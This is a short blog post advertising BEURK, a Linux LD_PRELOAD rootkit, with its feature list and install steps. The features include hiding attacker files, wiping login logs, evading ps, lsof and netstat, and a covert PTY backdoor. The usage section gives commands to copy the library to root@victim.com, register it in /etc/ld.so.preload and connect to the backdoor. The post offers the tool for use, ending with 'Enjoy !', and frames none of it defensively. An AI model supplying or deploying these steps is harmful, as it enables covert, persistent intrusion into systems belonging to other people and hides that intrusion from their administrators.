Sunday, 15 November 2015

Beurk - Experimental Unix Rootkit

BEURK  is an userland preload rootkit  for GNU/Linux, heavily focused around anti-debugging and anti-detection.
NOTE: BEURK is a recursive acronym for B EURK E xperimental U nix R oot K it

Features   

  • Hide attacker files and directories 
  • Realtime log cleanup (on utmp/wtmp  ) 
  • Anti process and login detection 
  • Bypass unhide, lsof, ps, ldd, netstat analysis 
  • Furtive PTY backdoor client 

Upcoming features   

  • ptrace(2)  hooking for anti-debugging 
  • libpcap  hooking undermines local sniffers 
  • PAM backdoor for local privilege escalation  


Usage   

  • Compile  

    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make

  • Install  

      scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'

  • Enjoy !  

    ./client.py victim_ip:port # connect with furtive backdoor

Dependencies   

The following packages are not required in order to build BEURK at the moment: 

  • libpcap  - to avoid local sniffing 
  • libpam  - for local PAM backdoor 
  • libssl  - for encrypted backdoor connection 

Example on debian:  

    apt-get install libpcap-dev libpam-dev libssl-dev